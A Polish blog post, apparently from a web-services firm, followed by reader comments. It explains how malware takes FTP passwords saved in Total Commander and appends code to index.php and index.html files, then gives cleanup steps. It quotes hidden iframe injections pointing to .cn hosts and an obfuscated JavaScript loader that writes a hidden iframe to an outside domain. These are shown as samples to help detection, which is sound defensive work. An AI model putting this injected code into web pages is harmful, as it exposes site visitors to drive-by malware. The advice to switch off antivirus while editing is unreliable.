Ostatnimi czasy coraz więcej klientów / ludzi „skarży” się na wirusy na swoich stronach internetowych – nie są to typowe „wirusy” a „po prostu” kawałek kodu źródłowego, który dopisuje się do plików index.php, index.html … itd
Pewnie zastanawia to Państwa jakim cudem się ten wirus dostał się na stronę?
Więc jest to powodem zawirusowanego systemu operacyjnego i zawartego hasła do serwera FTP w programie Total Commander, który niestety jest podatny na tego typu zabieg. Wirus sprawdza wszystkie konta FTP zapisane w programie i jeżeli ma możliwość zalogować się na daną stronę , loguje się a następnie wyszukuje typowe nazwy plików (np. index.php, index.html … ) i na końcu kodu dopisuje kilka linijek swojego kodu, który raz ma postać <iframe> a innym razem jako zaawansowany kawałek kodu JavaScript.
W wynikach wyszukiwania Google, często można znaleźć strony przy który jest napisane „Ta witryna może wyrządzić szkody na twoim komputerze” to oznacza, że dana strona właśnie posiada dopisany tego typu kod.
Jak usunąć tego wirusa?
- Po pierwsze i najważniejsze – od razu zmienić hasło do serwera FTP i nie zapisywać go w Total Commanderze (najlepiej go podawać podczas logowania, bądź po prostu skorzystać z innego oprogramowania, które jest wiele…)
- Zalogować się na serwer FTP i skopiować wszystkie pliki na swój lokalny dysk (komputer)
- Lokalnie na komputerze przeglądnąć wszystkie pliki poszukując kodu pokroju:
<iframe src=”http://mixante.cn/in.cgi?income55″ width=1 height=1 style=”visibility: hidden”></iframe>
<iframe src=”http://cheapslotplay.cn/in.cgi?income48″ width=1 height=1 style=”visibility: hidden”></iframe>
… itd
Zależność jest jedna – wyraz – „income” i w poszukiwaniu takiego wyrazu na początek zalecamy się skupić, gdy tylko znajdą Państwo tego typu kod, należy go usunąć i wgrać plik na serwer FTP nadpisując stary.
Drugim rodzajem „wirusa” może być kod podobny do:
<!– ad –><script>
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv=”write”;
mzsrv=”me”;
zqfqw=”et”;
gdtrk=”/’ st”;
rpiia=”yl”;
qxaol=”";
ldlvw=”i”;
zfhuu=”ty”;
hvkhb=”:h”;
hbqmm=”d”;
hauzn=”";
zdqdp=4;
sjgbi=”if”;
rpygo=”r”;
syjnh=” sr”;
rwanv=”c”;
elujl=”=”;
hrgnc=863;
akzpp=8853;
tplxn=” „;
cvtot=”</”;
qtndm=”";
jlooz=3953;
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv=”write”;
mzsrv=”me”;
zqfqw=”et”;
gdtrk=”/’ st”;
rpiia=”yl”;
qxaol=”";
ldlvw=”i”;
zfhuu=”ty”;
hvkhb=”:h”;
hbqmm=”d”;
hauzn=”";
zdqdp=4;
sjgbi=”if”;
rpygo=”r”;
syjnh=” sr”;
rwanv=”c”;
elujl=”=”;
hrgnc=863;
akzpp=8853;
tplxn=” „;
cvtot=”</”;
qtndm=”";
jlooz=3953;
gftzo=(9.007e3>=5e1?uyimh:qxcxg);
jjaqh=(ddytx>.2438?xkjpv:3.);
gmbpt=(7.3e1>=36?mzsrv:.45);
zxtsi=(323,zqfqw+gdtrk+rpiia+”e=’”+”v”+”isib”);
hzpmf=(0×587,qxaol+ldlvw+”li”+zfhuu+hvkhb+”id”+hbqmm+”en”+”‘”+hauzn);
rmtyf=(6.5e1,”");aaa=((567,gftzo),(0×2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486)
.2717<=.77?jjaqh:0x14))](((zdqdp,2.),(0.591,”"+”<”+sjgbi+rpygo+”a”)+(82,gmbpt)+(0.1301,syjnh+rwanv+elujl+”‘”+”h”+”ttp”+”")+(8581.<.887?0.7:”://t”+”ruittbros.n”)+(476,zxtsi)+(hrgnc>=akzpp?9.909e3:hzpmf)+(69<38.?0.249:tplxn+”>”+cvtot+”if”+qtndm)+(2.>1.?”ram”+”e>”:64.)+(223.>=jlooz?1.:rmtyf)));</script><!– /ad –><!DOCTYPE html PUBLIC „-//W3C//DTD XHTML 1.0 Transitional//EN” „http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
Proszę mieć na uwadze, że to w żadnym przypadku nie jest wina hostingu, obojętnie czy to będzie nazwa.pl, home.pl czy inna firma hostingowa (aczkolwiek istnieją skrajne przypadki…).
Po usunięciu w/w kodów i wgraniu ich na serwer FTP strona powinna być już odkażona 
W razie problemów (czy też braku umiejętności) z usunięciem wirusa, zapraszamy do kontaktu z nami.
mam dokładnie ten problem na kilku moich stronach, uzywalem total commandera i na prawie wszystkich jest wirus
mam problem jak to usunąć, gdy chce ściagnac index.html albo index.php antywirus krzyczy ze to niebezpieczne i odrazu usuwa ten plik
czy jest niebezpiecznym wylaczenie antywirusa na czas przeszukania kodu. czy ten kod moze zrobic cos nie tylko ze stroną www ale i z moim komputerem?
Na spokojnie możesz wyłączyć antywirusa na czas usuwania wirusa z pliku.
Polecam Ci dodatkowo zmienić Total Commandera na innego klienta FTP.
zmienilem juz klienta ftp
na stronach ktore mialem zrobione w html-u
wystarczyla podmiana zdrowych plikow index.html i zmiana hasla ftp
mam jednak problem ze zlokalizowaniem wirusa w cmsie extreme-fusion
co mam zrobic?
Zobacz może w katalogu z template’ami
poradzilem sobie!
w moim nowym kliencie ftp ustawilem kolejnosc pokazywania plików na ostatnio modyfikowane
okazało sie ze ostatnio modyfikowane przeze mnie pliki były w modtfikowane na przełomie stycznia i lutego tymczasem zauwazylem ze ktos modyfikowal je w poznych porach nocnych i wczesno rannych pod koniec lipca
zainteresowalo mnie to i zacząlem grzebac w kodzie (jezeli komus nie powiedzie sie sciagniecie zainfekowanego pliku prosze zmienic jego rozszerzenie z .html lub .php na .txt wtedy powinno pojsc gładko)
okazało sie ze we wszystkich plikach w ktorych byla fraza index (a w cms-ie jest ich duzo,bo w poszczegolnych folderach jest chociaz jeden) był wsztrzykniety kod framein tzn taki jak pokazany jest powyzej tylko ze z jakiejs ruskiej domeny(BURRAKI!!!)
usunalem ten kod, a troche tego bylo i gra gitara!! dla 15-latka to nie lada sukces!
Wymień klienta FTP z TC na FileZille. Na czas usuwania kodu z pliku index możesz wyłączyć program antywirusowy. Jeśli dostałeś filtr od google to strona powinna wrócić na swoje miejsce po ponownym przeindeksowaniu jeśli jest „czysta” – jeśli nie wraca napisz do google prośbę o przywrócenie strony.
Witam,
a czy jest możliwe, że takowy wirus zmieni jakoś hasło do użytkownika ftp?
Witaj,
Jest to raczej nie możliwe, gdyż wszystkie dane do konta ftp. są zapisane i chronione przez firmę hostingową.
Witam, posiadam stronę na której antywirus (Avats, Nod) wykrywają wirusa. Wyświetla komunikat:
Obiekt:
http://nazwa-strony.pl/templates/nazwa-szablonu/css/js/addons...
Zagrożenie: HTML/iframe/C.Gen.wirus
Informacje: połączenie zakończone -poddany kwarantanie.
Wszystko ładnie piękne ale nie mogę znaleźć żadnego pliku pod nazwą „addons…”
Co robić ?
Witam, mam problem nie wiem jak poradzić sobie z tym wirusem. Używam filezille.
Antywirus (Nod) wyświetla komunikat że w folderze templates -> css – > js i plik addons… jest wirus iframe. Pliku addons nie mogę nigdzie znaleźć. Pomóżcie
Przeszukaj folder z templatką
Mam podobny problem. Ludzie mówią mi, że na stronach pisanych przeze mnie są wirusy, ale mój antywirus (avira) nic nie melduje. Nie wiem, jakich programów używają, ani jakie komunikaty im się pokazują. Google nic nie zaznacza przy wyszukiwaniu stron. Czy możliwe, że antywirus się myli – jak sprawdzić: mój czy innych? Przejrzałam kilka plików .index.php, index. html, ale nie znalazłam dopisanego kodu. Co mam robić? Proszę o pomoc.
mój antyvir „avira” ostrzega mnie przed wirusem na moje stronie http://www.litwin.freehost.pl/galeria/galeria.htm , okazało się , ze doklejany tam jest kod iframe, po próbach wczytywania na serwer nowej strony itd. spróbowąłem wrzucić cała nową czysta stronę pod inny adres tej samej firmy hostingowej
http://www.litwin.piwko.pl/galeria/galeria.htm
wirus również został doklejony
jednak po wrzuceniu strony na serwer innej darmowej firmy strona jest czysta :
http://www.fotobiznes.yoyo.pl/galeria/galeria.htm
w korespondencji z firmą freehost otrzyamłem odpowiedź , ze za darmowy serwer oni nie odpowiadają…
takwiec niestety jest to wina hostingu.
Zgodnie z ostatnim akapitem proszę o kontakt i jednocześnie o pomoc. Ponieważ zrobiłam wszystkie zalecane rzeczy a mimo to wirus na mojej stronie nie zniknął. Czy mogę prosić o numer gg albo napisanie do mnie – 12919396 nawet gdy będę niedostępna? Pozdrawiam
Pingback: Shar pei w blogu… » Blog Archive » Awaria bloga
Witam mam wirusa na stronie czy może mi ktoś pomóc jak to usunąć? moja strona to http://www.alecarp.pl jak ktoś wejdzie w źródło strony to chodzi o linki http://www.dalton.nu….
Proszę o pomoc.
Witam
Mam ten sam problem Total commandera juz odinstalowalem zminilem haslo do ftp, ale z wirusem nie moge sobie poradzic Microsoft Security Essentials go nie wykrywa… co mam zrobic?? prosze o pomoc gg-5351916
pozdrawiam
Witam.
Ja mam nieco inny problem, mianowicie na mojej stronie niedawno – wraz z wczytywaniem strony – pojawiło się okienko prosząc o login i hasło.
Wszystko będzie jasne jak wejdziecie na moją stronę – http://www.tonabloga.blogspot.com
Czy możecie mi powiedzieć jak to usunąć oraz
skąd to się wzięło ??